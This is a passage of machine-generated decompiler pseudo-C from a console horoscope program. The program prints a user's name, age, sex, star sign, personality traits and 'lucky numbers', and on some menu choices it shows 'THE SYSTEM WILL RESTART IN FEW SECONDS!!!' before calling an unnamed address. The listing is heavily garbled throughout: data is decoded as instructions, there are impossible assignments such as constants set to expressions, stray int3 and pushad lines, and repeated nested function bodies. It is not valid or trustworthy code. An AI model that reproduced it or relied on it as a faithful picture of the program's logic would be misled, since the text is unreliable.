																								__ecx =  *_t418;
																								 *_t418 = _t420;
																								if(__eflags >= 0) {
																									__eflags = __eax - 0x3d4d9701;
																									 *((intOrPtr*)(__ebx + 0x4e)) =  *((intOrPtr*)(__ebx + 0x4e)) + __ebp;
																									__eflags = __eax - 0x3d520e01;
																									 *((intOrPtr*)(__edi - 0x63fec2ae)) =  *((intOrPtr*)(__edi - 0x63fec2ae)) + __esi;
																									__esi = __esi - 1;
																									__eflags = __eax - 0x3d4ee601;
																									 *__eax = __esi +  *__eax;
																									__edi = __edi - 1;
																									__eflags = __eax - 0x3d4f7a01;
																									__esp = __esp + __eax;
																									__edi = __edi - 1;
																									__eflags = __eax - 0x3d500e01;
																									 *((intOrPtr*)(__eax + 0x50)) =  *((intOrPtr*)(__eax + 0x50)) + __ebx;
																									__eflags = __eax - 0x3d50a201;
																									__esp = __esp + __ebp;
																									_push(__eax);
																									__eflags = __eax - 0x3d513601;
																									 *((intOrPtr*)(__eax - 0x38fec2af)) =  *((intOrPtr*)(__eax - 0x38fec2af)) + __eax;
																									_push(__ecx);
																									__eflags = __eax - 0xcccccc01;
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									_push(__ebp);
																									__ebp = __esp;
																								}
																								__esp = __esp - 0x20;
																								_push(__ebx);
																								_push(__esi);
																								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																								__esi = _v4;
																								_push(__esi);
																								_push("Name: %s");
																								 *0x13fe250 = 0x30037;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__ebx = _v8;
																								0x7da = 0x7da - __ebx;
																								_push(0x7da);
																								_push("Age=%d");
																								 *0x13fe250 = 0x40037;
																								_v36 = 0x7da - __ebx;
																								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v0;
																								 *0x13fe250 = 0x50037;
																								_v40 = _v0;
																								_push(E013DC111(_v0));
																								_push("Sex=%c");
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								_push("Your horoscope sign is Libra-The Balance");
																								 *0x13fe250 = 0x20003;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								_push("__");
																								 *0x13fe250 = 0x3000a;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								_push("___.\'  \'.___");
																								 *0x13fe250 = 0x40005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								_push("____________\n\n");
																								 *0x13fe250 = 0x50005;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__esp = 0x30 + __esp;
																								_v52 = "\n*  You are rarely lazy.";
																								_v48 = "\n*  You work hard, and also demand that your partners work just as hard.";
																								_v44 = "\n*  You have a strong sense of justice and fair play.";
																								__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																								__eax = __eax - 1;
																								__eflags = __eax - 5;
																								if(__eflags > 0) {
																									L196:
																									_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
																									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																									__esp = 4 + __esp;
																									__eax =  *0x13d0000();
																									_pop(__esi);
																									_pop(__ebx);
																									return __eax;
																								} else {
																									_push(__edi);
																									__edi = _v12;
																									do {
																										switch( *((intOrPtr*)(__eax * 4 +  &M013D5AB8))) {
																											case 0:
																												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																												__edx = _v0;
																												__edx = __esi;
																												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx) = E013D18E0();
																												_push("HERE IS WHAT YOU ARE!!!\n");
																												 *0x13fe250 = 0x80001;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__esp = 0x10 + __esp;
																												 *0x13fe250 = 0x90001;
																												__eflags = __edi - 0xa;
																												if(__edi <= 0xa) {
																													_v8 = __edi;
																													__eax = __edi;
																												} else {
																													__eax = 0x66666667;
																													__edx = 0x66666667 * __edi >> 0x20;
																													__eax = 0x66666667 * __edi;
																													__edx = 0x66666667 * __edi >> 0x20 >> 2;
																													__eax = __edx + (__edx >> 0x1f);
																													__ecx = __eax + __eax * 4;
																													__ecx = __eax + __eax * 4 + __eax + __eax * 4;
																													__eax = __edi;
																													__eax = __edi - __ecx;
																													_v8 = __eax;
																												}
																												__eflags = __eax;
																												if(__eax == 0) {
																													_v8 = 5;
																													__eax = _v8;
																												}
																												_v24 = __eax;
																												__eax = __eax + __eax;
																												__eax = __eax + __eax;
																												__eflags = __eax;
																												__edx = __ebp + __eax - 0x24;
																												_v32 = 1;
																												_v28 = __edx;
																												while(1) {
																													__eflags = _v24 - 0x30;
																													if(__eflags > 0) {
																														break;
																													}
																													__eax = _v28;
																													__ecx =  *_v28;
																													_push( *_v28);
																													_push("\n\n%s");
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													_push("\nEnter any key....");
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													__esp = 0xc + __esp;
																													__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																													__ecx = _v8;
																													_v24 =  &(_v24[__ecx]);
																													__eax = _v32;
																													__ecx = __ecx + __ecx;
																													_v28 =  &(_v28[__ecx]);
																													__eax =  &(_v32[1]);
																													_v32 = __eax;
																													__eflags = __eax - 5;
																													if(__eflags < 0) {
																														continue;
																													}
																													break;
																												}
																												_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												_push("\n\n\n\n\nEnter any key.....");
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__esp = 8 + __esp;
																												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																												goto L194;
																											case 1:
																												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																												__edx = _v0;
																												__edx = __esi;
																												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx) = E013D18E0();
																												__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																												goto L194;
																											case 2:
																												E013DB418(__ebx, __edx, __eflags, "cls") = _v0;
																												__edx = __esi;
																												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx) = E013D18E0();
																												_push("------------------------------------------------------------------");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												_push("------------------------------------------------------------------");
																												 *0x13fe250 = 0x100005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edi * 8 = __edi * 8 - __edi;
																												_push(__edi * 8 - __edi);
																												_push("YOUR LUCKY NUMBERS ARE: %d\t");
																												 *0x13fe250 = 0xc000a;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edx =  &(__edi[2]);
																												_push(__edx);
																												_push("%d\t");
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__ecx = __edi;
																												__ecx = __edi * 0x31;
																												__eax = 0x8d3dcb09;
																												__edx = 0x8d3dcb09 * __ecx >> 0x20;
																												__eax = 0x8d3dcb09 * __ecx;
																												__edx = (0x8d3dcb09 * __ecx >> 0x20) + __ecx;
																												__edx = (0x8d3dcb09 * __ecx >> 0x20) + __ecx >> 4;
																												__edx = __edx >> 0x1f;
																												__eax = __edx + (__edx >> 0x1f);
																												_push(__edx + (__edx >> 0x1f));
																												_push("%d\t");
																												E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x66666667;
																												__edx = 0x66666667 * __edi >> 0x20;
																												__eax = 0x66666667 * __edi;
																												__edx = 0x66666667 * __edi >> 0x20 >> 1;
																												__eax = __edx + (__edx >> 0x1f);
																												__ecx = __eax + __eax * 4;
																												__edx = __edi + __edi;
																												__edx = __edi + __edi - __eax + __eax * 4;
																												_push(__edx);
																												_push("%d\t");
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												_push("Enter any key to continue...");
																												 *0x13fe250 = 0x160032;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__esp = 0x38 + __esp;
																												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																												goto L194;
																											case 3:
																												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																												__edx = _v0;
																												__edx = __esi;
																												E013D1C00(__ebx, __esi, __edi, __esi, __eflags, _v0, __ebx) = E013D18E0();
																												__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																												__eax = __eax - 1;
																												__eflags = __eax - 0xb;
																												if(__eflags <= 0) {
																													switch( *((intOrPtr*)(__eax * 4 +  &M013D5AD0))) {
																														case 0:
																															goto L181;
																														case 1:
																															goto L182;
																														case 2:
																															goto L183;
																														case 3:
																															goto L184;
																														case 4:
																															goto L185;
																														case 5:
																															goto L186;
																														case 6:
																															goto L187;
																														case 7:
																															goto L188;
																														case 8:
																															goto L189;
																														case 9:
																															goto L190;
																														case 0xa:
																															goto L191;
																														case 0xb:
																															goto L192;
																													}
																												}
																												goto L194;
																											case 4:
																												_push(E013DB07D());
																												__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																												__esp = 4 + __esp;
																												goto L194;
																											case 5:
																												_push(0);
																												__al = __al + __ch;
																												gs =  *__edx;
																												_a1409744949 = _a1409744949 + __cl;
																												__eflags = __eax - 0x3d54f201;
																												 *__edx =  *__edx + __ebx;
																												_push(__ebp);
																												__eflags = __eax - 0x3d55f001;
																												 *((intOrPtr*)(__edx - 0x51fec2a7)) =  *((intOrPtr*)(__edx - 0x51fec2a7)) + __edi;
																												_pop(__edx);
																												__eflags = __eax - 0x3d562401;
																												 *((intOrPtr*)(__ecx + 0x56)) =  *((intOrPtr*)(__ecx + 0x56)) + __esi;
																												__eflags = __eax - 0x3d56be01;
																												 *__ebx =  *__ebx + __ecx;
																												_push(__edi);
																												__eflags = __eax - 0x3d575801;
																												_v234799805 = _v234799805 + __esp;
																												_push(__edi);
																												__eflags = __eax - 0x3d583f01;
																												 *((intOrPtr*)(__eax + 0x58d9013d + __ebx * 2)) =  *((intOrPtr*)(__eax + 0x58d9013d + __ebx * 2)) + __ecx;
																												__eflags = __eax - 0x3d592601;
																												 *((intOrPtr*)(__eax + 0x59)) =  *((intOrPtr*)(__eax + 0x59)) + __esi;
																												__eflags = __eax - 0xec8b5501;
																												_push(__ebp);
																												__ebp = __esp;
																												__esp = __esp - 0x14;
																												_push(__ebx);
																												_push(__esi);
																												_push(__edi);
																												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																												__esi = _v292;
																												_push(__esi);
																												_push("Name: %s");
																												 *0x13fe250 = 0x30037;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__edi = _v296;
																												0x7da = 0x7da - __edi;
																												_push(0x7da);
																												_push("Age=%d");
																												 *0x13fe250 = 0x40037;
																												_v320 = 0x7da - __edi;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__ebx = _v288;
																												__eax = __bl;
																												 *0x13fe250 = 0x50037;
																												_push(E013DC111(__bl));
																												_push("Sex=%c");
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__esp = 0x20 + __esp;
																												__eax = E013D1940();
																												_v328 = "\n*  You are usually filled with inherent contradiction.";
																												_v324 = "\n*  You generally become interested in occult matters.";
																												__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																												__eax = __eax - 1;
																												__eflags = __eax - 5;
																												if(__eflags > 0) {
																													L228:
																													_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													__esp = 4 + __esp;
																													__eax =  *0x13d0000();
																													_pop(__edi);
																													_pop(__esi);
																													_pop(__ebx);
																													return __eax;
																												} else {
																													do {
																														switch( *((intOrPtr*)(__eax * 4 +  &M013D61D0))) {
																															case 0:
																																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																__edx = __esi;
																																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D1940();
																																_push("HERE IS WHAT YOU ARE!!!\n");
																																 *0x13fe250 = 0x90001;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__ecx = _v16;
																																__esp = 0x10 + __esp;
																																 *0x13fe250 = 0xa0001;
																																__eflags = __ecx - 0xa;
																																if(__ecx <= 0xa) {
																																	_v12 = __ecx;
																																	__eax = __ecx;
																																} else {
																																	__eax = 0x66666667;
																																	__edx = 0x66666667 * __ecx >> 0x20;
																																	__eax = 0x66666667 * __ecx;
																																	__edx = 0x66666667 * __ecx >> 0x20 >> 2;
																																	__eax = __edx + (__edx >> 0x1f);
																																	__edx = __eax + __eax * 4;
																																	__edx = __eax + __eax * 4 + __eax + __eax * 4;
																																	__eax = __ecx;
																																	__eax = __ecx - __edx;
																																	_v12 = __eax;
																																}
																																__eflags = __eax;
																																if(__eax == 0) {
																																	_v12 = 5;
																																	__eax = _v12;
																																}
																																_v4 = __eax;
																																__eax = __eax + __eax;
																																__eax = __eax + __eax;
																																__eflags = __eax;
																																__eax = __ebp + __eax - 0x18;
																																_v32 = 1;
																																_v28 = __eax;
																																while(1) {
																																	__eflags = _v4 - 0x28;
																																	if(__eflags > 0) {
																																		break;
																																	}
																																	__ecx = _v28;
																																	__edx =  *_v28;
																																	_push(__edx);
																																	_push("\n\n%s");
																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																	_push("\nEnter any key....");
																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																	__esp = 0xc + __esp;
																																	__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																	__ecx = _v12;
																																	_v4 = _v4 + __ecx;
																																	__eax = _v32;
																																	__ecx = __ecx + __ecx;
																																	_v28 =  &(_v28[__ecx]);
																																	__eax =  &(_v32[1]);
																																	_v32 = __eax;
																																	__eflags = __eax - 6;
																																	if(__eflags < 0) {
																																		continue;
																																	}
																																	break;
																																}
																																_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																_push("\n\n\n\n\nEnter any key.....");
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__esp = 8 + __esp;
																																__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																goto L227;
																															case 1:
																																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																__edx = __esi;
																																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D1940();
																																__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																																goto L227;
																															case 2:
																																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																__edx = __esi;
																																E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D1940();
																																_push("------------------------------------------------------------------");
																																 *0x13fe250 = 0xa0005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																_push("------------------------------------------------------------------");
																																 *0x13fe250 = 0x120005;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__eax = _v16;
																																__ecx = __eax * 8;
																																_push(__eax * 8);
																																_push("YOUR LUCKY NUMBERS ARE: %d\t");
																																 *0x13fe250 = 0xe000a;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edx = _v16;
																																__edx =  &(_v16[9]);
																																_push(__edx);
																																_push("%d\t");
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__eax = _v16;
																																__eax = __eax << 4;
																																(__eax << 4) - __eax = (__eax << 4) - __eax + (__eax << 4) - __eax;
																																__ecx = (__eax << 4) - __eax + (__eax << 4) - __eax + (__eax << 4) - __eax + (__eax << 4) - __eax;
																																__eax = 0x6bca1af3;
																																__edx = 0x6bca1af3 * __ecx >> 0x20;
																																__eax = 0x6bca1af3 * __ecx;
																																__edx = 0x6bca1af3 * __ecx >> 0x20 >> 4;
																																__edx = __edx >> 0x1f;
																																__eax = __edx + (__edx >> 0x1f);
																																_push(__edx + (__edx >> 0x1f));
																																_push("%d\t");
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__ecx = _v16;
																																__eax = 0x55555556;
																																__edx = 0x55555556 * __ecx >> 0x20;
																																0x55555556 * __ecx = __edx;
																																__edx >> 0x1f = __edx + (__edx >> 0x1f);
																																__eax = __edx + (__edx >> 0x1f) + __ecx;
																																_push(__edx + (__edx >> 0x1f) + __ecx);
																																_push("%d\t");
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																_push("Enter any key to continue...");
																																 *0x13fe250 = 0x160032;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__esp = 0x38 + __esp;
																																__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																goto L227;
																															case 3:
																																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																__edx = __esi;
																																E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ebx, __edi) = E013D1940();
																																__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																																__eax = __eax - 1;
																																__eflags = __eax - 0xb;
																																if(__eflags <= 0) {
																																	switch( *((intOrPtr*)(__eax * 4 +  &M013D61E8))) {
																																		case 0:
																																			goto L214;
																																		case 1:
																																			goto L215;
																																		case 2:
																																			goto L216;
																																		case 3:
																																			goto L217;
																																		case 4:
																																			goto L218;
																																		case 5:
																																			goto L219;
																																		case 6:
																																			goto L220;
																																		case 7:
																																			goto L221;
																																		case 8:
																																			goto L222;
																																		case 9:
																																			goto L223;
																																		case 0xa:
																																			goto L224;
																																		case 0xb:
																																			goto L225;
																																	}
																																}
																																goto L227;
																															case 4:
																																_push(E013DB07D());
																																__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																																__esp = 4 + __esp;
																																goto L227;
																															case 5:
																																__eax = E013DC543(0);
																																0x3d5c();
																																 *((intOrPtr*)(__ecx - 0x7dfec2a4)) =  *((intOrPtr*)(__ecx - 0x7dfec2a4)) + __ebp;
																																_pop(__ebp);
																																__eflags = __eax - 0x3d612501;
																																__edi = __edi + __eax;
																																asm("popad");
																																__eflags = __eax - 0x3d5db301;
																																__ebp = __edi + __ebp;
																																_pop(__ebp);
																																__eflags = __eax - 0x3d5e4701;
																																 *((intOrPtr*)(__ecx - 0x24fec2a2)) =  *((intOrPtr*)(__ecx - 0x24fec2a2)) + __edx;
																																_pop(__esi);
																																__eflags = __eax - 0x3d5f2501;
																																__edi[0x17] = __edi[0x17] + __ebp;
																																__eflags = __eax - 0x3d5fb901;
																																 *__ebx =  *__ebx + __eax;
																																asm("pushad");
																																__eflags = __eax - 0x3d604d01;
																																 *((intOrPtr*)(__edi - 0x21fec2a0)) =  *((intOrPtr*)(__edi - 0x21fec2a0)) + __edx;
																																asm("pushad");
																																__eflags = __eax - 0xcccccc01;
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																asm("int3");
																																_push(__ebp);
																																__ebp = __esp;
																																__esp = __esp - 0x14;
																																_push(__ebx);
																																_push(__esi);
																																_push(__edi);
																																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																__esi = _v320;
																																_push(__esi);
																																_push("Name: %s");
																																 *0x13fe250 = 0x30037;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__edi = _v324;
																																0x7da = 0x7da - __edi;
																																_push(0x7da);
																																_push("Age=%d");
																																 *0x13fe250 = 0x40037;
																																_v348 = 0x7da - __edi;
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__ebx = _v316;
																																__eax = __bl;
																																 *0x13fe250 = 0x50037;
																																_push(E013DC111(__bl));
																																_push("Sex=%c");
																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																__esp = 0x20 + __esp;
																																__eax = E013D19D0();
																																_v356 = "\n*  You have an appetite for learning and travel.";
																																_v352 = "\n*  You prefer to be footloose and fancy free.";
																																__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																																__eax = __eax - 1;
																																__eflags = __eax - 5;
																																if(__eflags > 0) {
																																	L259:
																																	_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																	__esp = 4 + __esp;
																																	__eax =  *0x13d0000();
																																	_pop(__edi);
																																	_pop(__esi);
																																	_pop(__ebx);
																																	return __eax;
																																} else {
																																	do {
																																		switch( *((intOrPtr*)(__eax * 4 +  &M013D68E4))) {
																																			case 0:
																																				__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																				__edx = __esi;
																																				E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D19D0();
																																				_push("HERE IS WHAT YOU ARE!!!\n");
																																				 *0x13fe250 = 0x80001;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__ecx = _v20;
																																				__esp = 0x10 + __esp;
																																				 *0x13fe250 = 0x90001;
																																				__eflags = __ecx - 0xa;
																																				if(__ecx <= 0xa) {
																																					_v16 = __ecx;
																																					__eax = __ecx;
																																				} else {
																																					__eax = 0x66666667;
																																					__edx = 0x66666667 * __ecx >> 0x20;
																																					__eax = 0x66666667 * __ecx;
																																					__edx = 0x66666667 * __ecx >> 0x20 >> 2;
																																					__eax = __edx + (__edx >> 0x1f);
																																					__edx = __eax + __eax * 4;
																																					__edx = __eax + __eax * 4 + __eax + __eax * 4;
																																					__eax = __ecx;
																																					__eax = __ecx - __edx;
																																					_v16 = __eax;
																																				}
																																				__eflags = __eax;
																																				if(__eax == 0) {
																																					_v16 = 5;
																																					__eax = _v16;
																																				}
																																				_v8 = __eax;
																																				__eax = __eax + __eax;
																																				__eax = __eax + __eax;
																																				__eflags = __eax;
																																				__eax = __ebp + __eax - 0x18;
																																				_v36 = 1;
																																				_v32 = __eax;
																																				while(1) {
																																					__eflags = _v8 - 0x2b;
																																					if(__eflags > 0) {
																																						break;
																																					}
																																					__ecx = _v32;
																																					__edx =  *_v32;
																																					_push(__edx);
																																					_push("\n\n%s");
																																					__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																					_push("\nEnter any key....");
																																					__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																					__esp = 0xc + __esp;
																																					__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																					__ecx = _v16;
																																					_v8 =  &(_v8[__ecx]);
																																					__eax = _v36;
																																					__ecx = __ecx + __ecx;
																																					_v32 =  &(_v32[__ecx]);
																																					__eax =  &(_v36[1]);
																																					_v36 = __eax;
																																					__eflags = __eax - 6;
																																					if(__eflags < 0) {
																																						continue;
																																					}
																																					break;
																																				}
																																				_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				_push("\n\n\n\n\nEnter any key.....");
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__esp = 8 + __esp;
																																				__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																				goto L258;
																																			case 1:
																																				__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																				__edx = __esi;
																																				E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D19D0();
																																				__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																																				goto L258;
																																			case 2:
																																				__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																				__edx = __esi;
																																				E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D19D0();
																																				_push("------------------------------------------------------------------");
																																				 *0x13fe250 = 0x80005;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				_push("------------------------------------------------------------------");
																																				 *0x13fe250 = 0x100005;
																																				E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v20;
																																				__eax = _v20 + _v20 * 8;
																																				_push(_v20 + _v20 * 8);
																																				_push("YOUR LUCKY NUMBERS ARE: %d\t");
																																				 *0x13fe250 = 0xc000a;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				_v20 =  &(_v20[2]);
																																				_push( &(_v20[2]));
																																				_push("%d\t");
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__ecx = _v20;
																																				__ecx = _v20 * 0x23;
																																				__eax = 0x88888889;
																																				__edx = 0x88888889 * __ecx >> 0x20;
																																				__eax = 0x88888889 * __ecx;
																																				__edx = (0x88888889 * __ecx >> 0x20) + __ecx;
																																				__edx = (0x88888889 * __ecx >> 0x20) + __ecx >> 3;
																																				__edx = __edx >> 0x1f;
																																				__eax = __edx + (__edx >> 0x1f);
																																				_push(__edx + (__edx >> 0x1f));
																																				_push("%d\t");
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__ecx = _v20;
																																				__eax = __ecx;
																																				asm("cdq");
																																				__edx = __edx & 0x00000003;
																																				__edx + __ecx = __edx + __ecx >> 2;
																																				__eax = (__edx + __ecx >> 2) + __ecx;
																																				_push((__edx + __ecx >> 2) + __ecx);
																																				_push("%d\t");
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				_push("Enter any key to continue...");
																																				 *0x13fe250 = 0x160032;
																																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																				__esp = 0x38 + __esp;
																																				__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																				goto L258;
																																			case 3:
																																				__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																				__edx = __esi;
																																				E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ebx, __edi) = E013D19D0();
																																				__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																																				__eax = __eax - 1;
																																				__eflags = __eax - 0xb;
																																				if(__eflags <= 0) {
																																					switch( *((intOrPtr*)(__eax * 4 +  &M013D68FC))) {
																																						case 0:
																																							goto L245;
																																						case 1:
																																							goto L246;
																																						case 2:
																																							goto L247;
																																						case 3:
																																							goto L248;
																																						case 4:
																																							goto L249;
																																						case 5:
																																							goto L250;
																																						case 6:
																																							goto L251;
																																						case 7:
																																							goto L252;
																																						case 8:
																																							goto L253;
																																						case 9:
																																							goto L254;
																																						case 0xa:
																																							goto L255;
																																						case 0xb:
																																							goto L256;
																																					}
																																				}
																																				goto L258;
																																			case 4:
																																				_push(E013DB07D());
																																				__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																																				__esp = 4 + __esp;
																																				goto L258;
																																			case 5:
																																				__eax = E013DC543(0);
																																				__edx = 0xa4013d62;
																																				asm("arpl [0x3d63c901], di");
																																				_a939605320 = _a939605320 + 0xa4013d62;
																																				_push(0x68da013d);
																																				__eflags = __eax - 0x3d64c601;
																																				 *__eax = 0xa4013d62 +  *__eax;
																																				__eflags = __eax - 0x3d655a01;
																																				_a1710096673 = _a1710096673 + __esp;
																																				__eflags = __eax - 0x3d663801;
																																				 *0xFFFFFFFF70027AC8 =  *((intOrPtr*)(0xffffffff70027ac8)) + __eax;
																																				__eflags = __ax - 0x1601;
																																				asm("a16 cmp eax, 0x3d676001");
																																				 *0xFFFFFFFF95027AC9 =  *((intOrPtr*)(0xffffffff95027ac9)) + __ebp;
																																				asm("a16 cmp eax, 0xcccccc01");
																																				asm("int3");
																																				_push(__ebp);
																																				__ebp = __esp;
																																				__esp = __esp - 0x20;
																																				_push(__ebx);
																																				_push(__esi);
																																				__eax = E013DB418(__ebx, 0xa4013d62, __eflags, "cls");
																																				__esi = _v364;
																																				_push(__esi);
																																				_push("Name: %s");
																																				 *0x13fe250 = 0x30037;
																																				__eax = E013DB9F5(__ebx, 0xa4013d62, __edi, __esi, __eflags);
																																				__ebx = _v368;
																																				0x7da = 0x7da - __ebx;
																																				_push(0x7da);
																																				_push("Age=%d");
																																				 *0x13fe250 = 0x40037;
																																				_v396 = 0x7da - __ebx;
																																				E013DB9F5(__ebx, 0xa4013d62, __edi, __esi, __eflags) = _v360;
																																				 *0x13fe250 = 0x50037;
																																				_v400 = _v360;
																																				_push(E013DC111(_v360));
																																				_push("Sex=%c");
																																				__eax = E013DB9F5(__ebx, 0xa4013d62, __edi, __esi, __eflags);
																																				__esp = 0x20 + __esp;
																																				__eax = E013D1A50();
																																				_v412 = "\n*  You are usually ambitious.";
																																				_v408 = "\n*  You marked by a purposeful pursuit of your destiny.";
																																				_v404 = "\n*  You have a sense of purpose and a great faith in your own ability.";
																																				__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																																				__eax = __eax - 1;
																																				__eflags = __eax - 5;
																																				if(__eflags > 0) {
																																					L292:
																																					_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
																																					__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																					__esp = 4 + __esp;
																																					__eax =  *0x13d0000();
																																					_pop(__esi);
																																					_pop(__ebx);
																																					return __eax;
																																				} else {
																																					_push(__edi);
																																					__edi = _v24;
																																					do {
																																						switch( *((intOrPtr*)(__eax * 4 +  &M013D7038))) {
																																							case 0:
																																								E013DB418(__ebx, __edx, __eflags, "cls") = _v12;
																																								__edx = __esi;
																																								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v12, __ebx) = E013D1A50();
																																								_push("HERE IS WHAT YOU ARE!!!\n");
																																								 *0x13fe250 = 0x80001;
